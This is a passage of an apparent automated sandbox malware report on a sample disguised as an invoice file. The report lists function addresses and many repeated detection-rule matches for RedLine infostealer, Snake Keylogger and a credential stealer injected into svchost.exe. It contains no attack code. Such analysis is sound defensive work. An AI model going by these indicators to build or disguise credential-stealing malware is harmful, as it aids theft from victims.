              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A0B2311_2_086A0B23
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AEB3811_2_086AEB38
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A0B3011_2_086A0B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AF3E811_2_086AF3E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A8BC011_2_086A8BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AF3D711_2_086AF3D7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A17B011_2_086A17B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A8BB111_2_086A8BB1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AEF8011_2_086AEF80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086A179F11_2_086A179F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_086AEF9011_2_086AEF90
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: String function: 004BF8A0 appears 35 times
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: String function: 004B6AC0 appears 42 times
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: String function: 004AEC2F appears 68 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0040D606 appears 48 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0040E1D8 appears 88 times
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: String function: 008F6AC0 appears 42 times
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: String function: 008FF8A0 appears 35 times
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: String function: 008EEC2F appears 68 times
              Source: FACT0987789000900.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 6.2.juvenile.exe.3da0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 10.2.juvenile.exe.3c60000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 11.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
